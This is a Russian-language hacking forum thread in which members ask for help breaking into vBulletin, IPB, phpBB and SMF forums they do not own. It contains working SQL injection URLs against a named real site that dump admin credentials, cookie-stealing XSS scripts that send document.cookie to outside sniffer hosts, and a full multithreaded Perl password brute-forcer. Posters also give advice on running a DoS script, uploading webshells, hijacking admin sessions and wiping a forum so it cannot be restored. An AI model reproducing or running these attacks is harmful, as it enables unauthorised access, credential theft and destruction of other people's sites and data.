Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп

Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48

Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48

1. Насчет версии, тут наверное гугл лучший помощник: вбиваешь кусок текста из сплоента (лучше тот, где идет формирование отправляемого пакета) в гугл и смотришь на заголовки тем в которых нашелся этот сплоент (к сожалению не могу с жопореза нормально просмотреть сайты), но заметил что даты постов с этим сплойтом идут за 2006-2007 год, т.е. он явно старенький и скорее всего не актуальный в новых версиях.

2. Какие параметры?, это видно из исходника сплоента:

if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];

Два параметра - хост и директория с форумом, т.е. запускать так:
perl c:/1.pl www.test1.ru /forum/

Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет:

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

А если форум находится в корне сайта, то вторым параметром должен быть просто слеш.

P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу.

гугл сказал что это для версии vBulletin <= 3.6.3

всем хай,научите новичка sql инъекции... плиз

по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то

Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?

Я не знаю где написать решили тут...
Короче есть в городе провайдер я к нему подключён, он представляет форум внутри сети , но войти может только с подключением внешки который имеет ип вида ***.**.**.**, а Ip сетевой предоставленной провайдером вид 10.*.*.***, так вот вопрос можно ли войти в форум не включай внехи а просто по локалке ?

Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?
Там пятая ветка , вся информация в schema:

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*

Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса

Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках

К посту ниже:
Выполни Все рекоммендации :)

Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет

Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет

всё работает говорят же пробелы убери )

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/*

digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

http://www.hardvision.ru/admin/

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/*

Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося.

Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно

https://forum.antichat.ru/thread76958.html

sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.

Спасибо за ответы ~!DoK_tOR!~ и n0ne

кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно

кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно
читай
_http://forum.antichat.ru/thread24488.html

читай
_http://forum.antichat.ru/thread24488.html
прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши :confused:

прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши :confused:
Ты свой вопрос прочитай..и на мой ответ посмотри...

Ты свой вопрос прочитай..и на мой ответ посмотри...
КТО каким способом З А ЛИ ВАЕТ в пхпбб вебшелл? (уже есть доступ к админ панели)
конкретно ПОД phpBB 2.0.21 нужно (так как способы для версий выше могут не подойти)

и причем тут твой пост?

Буду краток. Сайт phenomen.ru не регистрирует пользователей на своём ресурсе, во избежание хакерских нападений. Возможно ли проникнуть без регистрации на его территорию.
P.S. Как?

народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru

народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru
http://boards.warhead.ru/ возможно 2.1.* :)

сенкс за ответ))
а народ, вот тема такая, в булке(vbulletin) версии 3.6.7 можно засунуть html в подпись(ну так во всяком случае на сайте одном), ятуда сую снифер - традиционно через ява скрипт, жду пол часа иду в лог снифера и что я вижу: все куки кроме id и пароля((( пишу знач вот так:
<script>img = new Image(); img.src = "http://na-s.ru/images/kirufka_1.gif?"+document.cookie;</script>
Адрес айта снифера: http://na-s.ru

kirufka, значит смотрит гость

а если смотрю я сам?)))
Вот щас проверил - написал себе самому в личку сообщение предварительно удалив лог снифера... В снифере появился один "пост", в нем все про меня, но по прежнему нету пароля и айди(

народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru
Invision Power Board v2.0

Всем Привет!
Интересует флудер для форума vBulletin 3.6.9
Нужно чтобы он в заданом разделе создавал темы с сообшениями, через определёное (указаное мной) время. Есть ли такие? :)

Привет всем, возник такой вопрос : получил доступ в админку форума на SMF 1.1.4, хочу снять базу. Если выбираю сжатие базы, то сервер скидает чехлы около минуты, а потом вылетает "Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error.
More information about this error may be available in the server error log."
(я считаю, что стоит ограничение на время выполнения пхп скрипта). Если выбираю опцию не сжимать базу, то дает скачать около 1 мб, а дальше процесс глохнет (причем независимо от того, сколько прошло времени (размер от 700 кб до 1.2 Мб)), такое ощущение что стоит ограничение и на размер выкачанной базы. Подскажите, что делать? Как это можно обойти .P.S. Сливаю шелл, но запустить его не могу, так как вылетает ошибка вида : File "/var/www/vhosts/xxx.xxx/httpdocs/forum/Themes/blackted/images/smile.php" is writeable by group

Всем Привет!
Интересует флудер для форума vBulletin 3.6.9
Нужно чтобы он в заданом разделе создавал темы с сообшениями, через определёное (указаное мной) время. Есть ли такие? :)
постучи мне в скайп rean1m5 - скину тебе флудер

Попытался выполнить эксплоит Invision Power Board <= 2.3.5 Multiple Vulnerabilities правленный Elekt на localhoste говорит что нет уязвимости(условия вроде бы искуственно созданы для уязвимости) по сцылке http://localhost/ipb/index.php?s=&act=xmlout&do=check-display-name&name=%2527 выдаёт notfound почемуто.

Есть вопрос по поводу Powered by SMF 1.1.5 , кароче нашёл форум этой версии , но про баги в сети ни слова , правда читал на секьюрити лаб вот тут http://www.securitylab.ru/vulnerability/356091.php , написано уязвимость присутствует в версиях до 1.0.13 и 1.1.5 , но а какая именно не написано ((Зарегался я на форуме , в профиле оказывается мона аватар через урл вставлять пишу : http://old.antichat.ru/cgi-bin/s.jpg , захожу на лог сниффака вижу проснифалось , но только QUERY пустая (( Кароче мож кто знает какаю нить уязвимость в этой версии форума , подскажите !

Подскажите какой форум самый безопасный?

Подскажите какой форум самый безопасный?
В принципе любой форум самой последней версии безопасный, главное его постоянно обновлять. Я порекомендовал бы SMF - простой в управлении и бесплатный

vBulletin

Скачал phpbb 2.0.13 с sourceforge - пиздец! Сплоиты не работают, highight баг не работает! http://localhost/phpbb2.0.13/viewtopic.php?t=1&highlight=phpinfo(); - ЧЯДНТ? Где взять бажную старую версию?

']как в phpbb 3.0.2 залить шелл имея доступы к админки.
sql, я *** знает сколько назад впрашивал еще про RC версии, никто и не ответил. Права были admin (не forum creator).

Ребята подскажите как один форум переадресовать на другой!

Ребята подскажите как один форум переадресовать на другой!
самый простой способ - это в папке с форумом положить допустим index.html и в нем нарисовать редирект. :)

самый простой способ - это в папке с форумом положить допустим index.html и в нем нарисовать редирект. :)
А Вы можете мне бросить этот редирект?

А Вы можете мне бросить этот редирект?
Конечно :)

<html>
<body>
<META HTTP-EQUIV="Refresh" CONTENT=1;URL="http://куда_надо_редирект/">
</body>
</html>

А это ничего что там файл index.php?

А это ничего что там файл index.php?
ну переименуй его в index_.php или в другой какой нибудь :)

спс, с меня +

Cлыш, чё то не работает переходит сюда, http://www.http.com//nau.hmarka.net//

Cлыш, чё то не работает переходит сюда, http://www.http.com//nau.hmarka.net//
Эх.. расфлудились
еще раз говорю.. в корень кидаешь index.html с содержанием


<html>
<body>
<META HTTP-EQUIV="Refresh" CONTENT=1;URL="http://yandex.ru/">
</body>
</html>

И если браузер не кеширует, то после перехода в этот корень, тебя кинет на яндекс.ру :) помоему ничего сложного нет.

Попытался выполнить эксплоит Invision Power Board <= 2.3.5 Multiple Vulnerabilities правленный Elekt на localhoste говорит что нет уязвимости(условия вроде бы искуственно созданы для уязвимости) по сцылке http://localhost/ipb/index.php?s=&act=xmlout&do=check-display-name&name=%2527 выдаёт notfound почемуто.
я так понял нужно это изменить(если версия русская)
$dberror = "IPS driver error"; на русскую надпись которая вылазит при ошибке с %2527

Cлыш, чё то не работает переходит сюда, http://www.http.com//nau.hmarka.net//
Не очень культурно когда что-то спрашиваешь употреблять 'слыш чота'

Самый Тупой вопрос:
Как мне узнать движок форума?))

внизу посмотреть что пишеться Powered by ______
если нету, то поискать похожие форумы , где есть это самое поуеред бай ..
посмотреть в исходнике .. бывает есть ..
посмотреть во встроеной жаве .. итд

>.:!FrE!:.<
Как было сказанно Powered by **, но там может быть ложная версия.
Анализируйте код, файлы, смотрите такие как changelog и т.д
Смотрите JS скрипты там тоже разработчик пишет версию, но не всегда.

Всем привет.
Имеется форум на движке ipb 2.3.1, при этом мне известно все о юзере MySQL, с которого он коннектится к бд (ну то есть логин, пароль, хост и имя бд). Также имеется большое желание на этом форуме немного пошалить =)
Вопрос: как бы это можно сделать? О существовании phpmyadmin'а на хосте ничего не известно. php и sql, в принципе, знаю, но вот взломом движков до этого заниматься не приходилось. Помогите кто чем сможет =)
Заранее спасибо.

Всем привет.
Имеется форум на движке ipb 2.3.1, при этом мне известно все о юзере MySQL, с которого он коннектится к бд (ну то есть логин, пароль, хост и имя бд). Также имеется большое желание на этом форуме немного пошалить =)
Вопрос: как бы это можно сделать? О существовании phpmyadmin'а на хосте ничего не известно. php и sql, в принципе, знаю, но вот взломом движков до этого заниматься не приходилось. Помогите кто чем сможет =)
Заранее спасибо.
site.ru:3306

site.ru:3306Проблема в том, что я не знаю, как к хосту из инета подключиться. INFO['sql_host']='forum_db'. Это может быть в том числе имя компа из их внутренней сети.
То есть прямое подключение, видимо, не подходит.

А кто подскажет тему где подробно и доступно написано как искать дыры и уязвимости? для новичков!

_http://forum.antichat.ru/thread32872-sql+faq.html
Посвящается всем новичкам

Проблема в том, что я не знаю, как к хосту из инета подключиться. INFO['sql_host']='forum_db'. Это может быть в том числе имя компа из их внутренней сети.
То есть прямое подключение, видимо, не подходит.

Юзай RST MySql скрипт или с99)).Там есть фукция по коннекту БД.Если не выходит,то,скорее всего, блокируются входящие соединения с определённого диапазона айпи адресов, или же просто запрещены удалённые подключения).На самом деле,причин может быть много:) :)

ЗЫ: это я так,если кто надумает спросить...

у меня вопрос как узнать версию форума phpbb ?

вот сайт http://vip.karelia.ru/ ,скажите пожайлуста версию php,зарание благодарен
извените если не туда запостил =( еше многово на форуме незнаю и я новичок

Господа! Чем подбирать пароль к аку vBulletin 3.0.x ?

такой вопрос что за хеш если это ваще хеш fsH1sRBI6rLuQ! не могли бы помочь рассшифровать!

Брут на перле
#!/usr/bin/perl

#################################################
# vBulletin 3 (rus) brute
# -------------
#
# copyright : (C) Cyber Lords, 2002-2007
# http://www.cyberlords.net
#
# Coded by VeX [614883]
#################################################

### modules ###
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;

### main ###
usage() if ($ARGV[0] eq "-h" || $ARGV[0] eq "-help");
print "\n\n~~~ vBulletin 3 (rus) brute by VeX 1.0.3 ~~~\n\n";
getopt("lpuht");

$logins = $opt_l || 'logins.txt';
$pass = $opt_p || 'pass.txt';
$host = $opt_u;
$logs = $opt_h || 'logs.txt';
$threads = $opt_t || 50;

open(P, $pass) or die "\n[-] Don't open ".$pass." file\n";
while(<P>) { push(@pass, $_); }
close(P);
open(L, $logins) or die "\n[-] Don't open ".$logins." file\n";
while(<L>) { push(@logins, $_); }
close(L);

print "[+] Loading ".scalar(@logins)." logins\n"; logs("[+] Loading ".scalar(@logins)." logins\n");
print "[+] Loading ".scalar(@pass)." passwords\n"; logs("[+] Loading ".scalar(@pass)." passwords\n\n");

foreach $login (@logins)
{
chomp($login);
foreach $pass (@pass)
{
chomp($pass);
push (@info, "$login---$pass");
}
}

#for(@info){ print "$_\n"; }

while(1) {
for ($i=0;$i<=$threads;$i++) {
unless($info[$counter]) {
killpidz();
exit;
}
if ($pid=fork()) {
push(@forked,$pid);
}
else {
($user, $pass) = split /---/, $info[$counter];
chomp($user); chomp($pass);

if(brute($user, $pass))
{
print "\n\n[+] Find [$user:$pass]";
logs("\n\n[+] Find [$user:$pass]");
$counter = scalar(@info)+1;
exit(1);
}
exit;
}
$counter++;
}
killpidz();
}

sub brute {
my($user, $pass) = @_;
$data = "vb_login_username=$user&cookieuser=1&vb_login_password=$pass&s=&do=login&vb_login_md5password=&vb_login_md5password_utf=";

$cookie_jar = new HTTP::Cookies();
$opera = new LWP::UserAgent;
$opera->agent('Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))');
$opera->timeout(30);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => 'http://google.com/';

$request = new HTTP::Request('GET', $host, $h);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);

open(C, ">login_1.html"); print C $content; close(C);

$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => $host;
$request = new HTTP::Request('POST', $host."login.php?do=login", $h);
$cookie_jar -> add_cookie_header($request);
$request->content_type('application/x-www-form-urlencoded');
$request->content('type=another');
$request->content($data);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);

open(C, ">login_2.html"); print C $content; close(C);

if($content=~m/Спасибо за вход/){ print "[+] $user:$pass ... ok\n"; return 1; }
else{ print "[-] $user:$pass ... error\n"; return 0; }
}

sub logs {
$text = shift;
open(L, ">>".$logs); print L $text; close(L);
}

sub usage {
print "\nUsage: $0 [options]...\n\n";
print "Options are:
-u: Forum url
-l: Login's file [Default: login.txt]
-p: Password's file [Default: pass.txt]
-h: Log's file [Default: logs.txt]
-t: Threads [Degault: 50]
-h: This help

Exemple:
perl brute.pl -u \"http://www.raginfo.ru/forum/\" -l users.txt -p big_pass.txt -h logi.txt -t 25\n";
exit(1);
}

sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}

exit(1);

нашел в логах следующее
String found where operator expected at (eval 15) line 1, near ")",""
\t(Missing operator before ","?) Bareword found where operator expected at (eval 15) line 1, near "","_SESSION_EXPIRE_LIST"
\t(Missing operator before _SESSION_EXPIRE_LIST?)
String found where operator expected at (eval 15) line 1, near "_SESSION_EXPIRE_LIST" => {""
Unquoted string "logged" may clash with future reserved word at (eval 15) line 1.
String found where operator expected at (eval 15) line 1, near "in" => 2400},""
Bareword found where operator expected at (eval 15) line 1, near "" => 2400},"reg_from"
\t(Missing operator before reg_from?)
String found where operator expected at (eval 15) line 1, near "reg_from" => ""
Bareword found where operator expected at (eval 15) line 1, near "" => "http"
\t(Missing operator before http?)
Unquoted string "http" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "//meet"
\t(Missing operator before eet?)
Unquoted string "eet" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sotchi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "ru" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fcgi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fpl" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sid" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "9a41fb838f1db13b9a43be32ac07e07e"
\t(Missing operator before a41fb838f1db13b9a43be32ac07e07e?)
String found where operator expected at (eval 15) line 1, at end of line
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Use of uninitialized value in sprintf at /usr/local/lib/perl5/site_perl/5.8.8/CGI/Session/File.pm line 93.
incomplete headers (0 bytes) received from server "/usr/local/www/meet.sotchi.ru/fcgi-bin/__start.fpl"

и соответсвенно в файле сессии (юзаю CGI::Session::File), вижу следующее (переводы строк добавил для формата):



$D = {
"password_value" => 148,
"bd2" => 12,
"bd1" => 23,
"myid" => 62,
"password" => 148,
"res_save" => "",
"reg_count" => 0,
"code" => "81o4d9yrjswtgxq9nfl66wei3j46tok6",
"_SESSION_ID" => "9a41fb838f1db13b9a43be32ac07e07e",
"_SESSION_ETIME" => 2400,
"reg_error_descr" => "",
"ccode" => "0519",
"location" => 1,
"~logged-in" => 1,
"_SESSION_REMOTE_ADDR" => "62.xxx...",
"_SESSION_CTIME" => "1225126077",
"login" => "Dandy",
"_SESSION_ATIME" => "1225127741",
"bd3" => 1982,
"reg_error" => "",
"login_value" => "abc \x{422}\x{441}\x{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
"reg_from" => "blah blah ?sid=9a41fb838f1db13b9a43be32ac07e07e"
};
{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
};


Я так понимаю тут уязвимость с Unicode или что то еще... есть мысли?

Можно ли вытащить из куков пароль админа а то на сайт по логином админа подставив куки зайти могу в админку нет((
вот куки:
SMFCookie692=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B i%3A1%3Bs%3A40%3A%22bb70ecc84a7a7d197e7017d250e60a 3be8309ea0%22%3Bi%3A2%3Bi%3A1414066970%3Bi%3A3%3Bi %3A0%3B%7D;%20PHPSESSID=89e357839c94fb76eeb52c6ab8 c404d7

Блин ребята я уже замучился =)
Вобщем нужна версия http://www.myrpg.ru/forum движек IPB и еще =) Может кто подскажет куда там делся файл http://www.myrpg.ru/forum/admin.php и уж если совем не лень то пожалуйста где там лежат .js

PS: Не я не полный нюб но все же =)

Хай, У меня вопрос скачал antiturk v 1.0 (Флудилка по форума )
На на форумах mybb . ru почему-то не пашит пробывал но нечего не получилось,смотрел видео как это делать....
Пишит ошибку a key with the name ----------------------------------------- потом цифры и all ready used .... внизу скрин
http://i033.radikal.ru/0811/70/e84892083a1c.png

И если вам не тяжело можете выложить тему где все всё всё есть для накрутки мубб.ру итг.......

Я получу ответ на свой вопрос или нет?

Demonboy возможно это хеш пасса?
bb70ecc84a7a7d197e7017d250e60a 3be8309ea0

Подскажите что за движок у форума http://nachfin.info/sql-forum/index.php Вроде как PHPbb, вот только какая версия?

У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?

никак не сделаешь, если backup есть )

У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?


Еси хост предостовляет улуги автомотического бекапа то не как, а большенство хостов их предоставляет)

Есть vBulletin 3.6.8.
Есть возможность использовать HMTL в подписи.
Что можно интересного сделать? :)

Ну раз интересного никто не посоветует, попробую просто пароли выведать. В подписи разместил скрипт
<script>img = new Image(); img.src = "http://domain.name/img.php?"+document.cookie;</script>
На сниффер приходять только bblastvisit, bblastactivity и bbthread_lastview (хмм). Хеша пароля нету, даже id юзера нету. Что за?

помоги плиз найти конвертер бд из vb в phpbb

просто спалили нулл над как нить базу перенести в другой двиг желатель в phpbb
и ваще это реально с вб куда либо базу конвертировать?

http://www.phpbb.com/community/viewtopic.php?f=10&t=325692
google.com

У меня один вопрос.
Не как не могу получить долгожданные куки.

Кто в состоянии помочь мне в моей затеи.
Я не делаю просто запрос на картинку, я хочу внедрить сниффер в ХТМЛ документ сделаный мною, это для того что бы не какие фильтры не спасли.

Вот примерные наброски, но через этот способ мне приходит только инфа о IP, хосте,
тоесть всё кроме кукисов.

<html>
<head>
<title>"*******"</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript" type="text/javascript">
document.write("<img.src='http://na-s.ru/images/********_1.gif?' +document.cookie>");
document.title = "www.BU_GA_GA.ru";
window.status = "Пожалуйста подождите";
</script>
<body onload="LoadThisPage()";
<script language="JavaScript" type="text/javascript">
function LoadThisPage()
{
window.location.href = "http://na-s.ru/pictures/*********.jpg";
}
</script>
</body>
</html>

NooB MC

А не проще зделать так?

<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>

спасиба попробую, если что отпишусь.

Здраствуйте.
подскажите пожалуйста начинающему..
есть форум. 100% дырявый..
phpBB
Через чанлог выяснил что 2.0.5
через /INSTALL 2.0.6

далее не знаю чем продолжить...
1) посмотрел видео (мне кажется достаточно известное) bazaphpbb, попробовал

http://сайт/forum/viewtopic.php?t=123456&highlight=%2527.$poster=`pwd`.%2527

(где 123456 как я понимаю номер темы)
ничего не выходит.
учетной записи id2 - нет.
Но точно знаю пользователей с правами админ - это 7 и 456.
подскажите пожалуйста что можно сделать ??

HTML выключен (в подписи в том числе)

P.S. пробовал замену куков

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7

после чего зашел на форум заново. куки изменились. в одной
b%3A0%3B
в другой
c66d207fa56c2bb04c041c1ef1a54589

NooB MC

А не проще зделать так?

<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>

Составил такой документ

<html>
<head>
<title> proverka </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript">
document.images[0].src="http://na-s.ru/images/***********_1.gif?"+document.cookie;
</script>
</body>

Но к сожалению ничего не выходит.
(при использовании этого совета картинка должна
быть видимой или нет?)
</html>

Посоветуйте ещё что нибудь, очень сильно надо.

Господа! Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
Нужно: выудить пасс админа.
Пробовал заэксплойтить, однако экспы пробовал только через perl, большинство где-то стопорилось.
Один прошел: SMF <= 1.1.4 SQL Injection Exploit, но выдал сообщение о "неуязвимости" форума.
Заливка шелла по описанным тут http://forum.antichat.ru/thread43633.html способам невозможна: нет доступа к админке, на форуме прикрыто выкладывание файлов.
Что и как ещё можно сделать? очень хочется пробиться туда?
Хелп?

Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.

А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.
Знаю владельцев форума лично просто. Админа как такового там нет.

Проблема в том что я все эти вещи, описанные постом выше сегодня вижу первый раз и, честно говоря, мне немного сложно осознать что, к чему, куда и зачем.

--------------------------------------------------------------------------------

Вообщем, прошу помочь со взломом форума.
Похоже это та же borda.
требуется повысить себе права для чтения закрытой ветки. Ну или увести ак модера.

От вас жду ссылок или советов

Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку

Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку
непойму... форум твой? у тебя есть доступ к фтп? если он твой в чём же проблема? измени доступ к админке на свой ip и вообще юзай поиск

форум не мои просто достал пасс админа а заити не могу

форум не мои просто достал пасс админа а заити не могу
а ты Ip его знаешь?
1) Если у тя с ним один провайдер можешь вытянуть у него логин и пароль от подключений...
2) прокся и то врятли
3) Хекай его форум)

Может кто подскажет, можно ли что-нить из этого выдавить:
Значит смог скомбинировать два ББКОДА "урл" и "блокквот" в итоге в штмл вот что:

<a href="http://polnij_bred/<blockquote>onerror=eval(...);</blockquote>">
Но есс-но не работает :( Что можно придумать учитывая, что эти два тега друг друга не выплевывают.
Спасибо

Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо :(

Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.

Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.
Под 2.3.5 есть эксплоит поищи на этом форуме... но если админ толковый, хотя у толкового уже 2.3.6 было бы :), то дырку сразу пропатчили...

Проверяется просто после index.php? добавляешь:
act=xmlout&do=check-display-name&name=%2527 и если увидишь сообщение мол драйвер не работает, то этот форум о тебе услышит :) :) :)

Если нет, то есть куча способов (хотя нет не куча, кучка, маленькая такая.... :D ) как угнать куку админа!

А вот пиляха как её заюзать, учитывая что эта гадость проверяет IP, не знаю... Это надо ГУРУ спрашивать, они знают. ТОка мож эта инфа пока что приватная :cool:

Есть спец тулзы которые позволяют менять хидеры на лету, но вот тока где в в ипб лежит инфа про ИП - хоть убейте не вижу :( Пробовал подменить свой айпи на 2ip.ru - нивопрос, получилось, а вот на IPB ... :(

Успехов.

Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет? :(

Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет? :(
админу отписать ..и рассказать ситуацию... :)

Админа на форуме уже 2 месяца нет поетому и хочу ломонуть :(

Помогите , есть ли возможность узнать пароль на закрытй форум ? ipb 2.1.6 .

2super-rol
http://forum.antichat.ru/threadnav25088-1-10.html
Выбирай нужный)

Можно ли с помощью снифера получить пароль пользователя на форуме ipb 2.1.6 ? используя функцию Жалоба , вставляя следующий код
<script>img = new Image(); img.src = "Адрес снифера?"+document.cookie;</script>

Какой текст нужно напсать чтобы аватар был снифером и крал куки ?

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???

Привет. Вообщем такая тема.Через скулю на сайте вытащил converge_pass_hash & pass_salt в надежде сбрутить пасс админа. Скока не брутил не получилось(наверн парольчик сложный). Потом решил зайт через куки,вытащил members_login_key но при входе идём проверку на какой-то ipb_stronghold,походу версия ipb новая т.к. в ранних такого небыло. нагуглил что эта хрень хэшируется из айпи айди пасса и ещё чего-то типо дополнительная защита при входе. так вот мне интересно можно как-нить потделать это при условии что айпи я знаю и всё остальное и зайдётли в админку с этими куками? Т.к. админка моя главная цель.

http://ru.wikipedia.org/wiki/IP-спуфинг

Я имел ввиду потделать поле ipb_stronghold в куках. Еслиб я знал как он точно хэшируется можно было написать скрипт который собрал бы хэш а дальше подставилбы его в куки.

Блин народ вот нашёл траблу в самописном скрипте к форуму, дописана гостевая, и там при таком запросе:
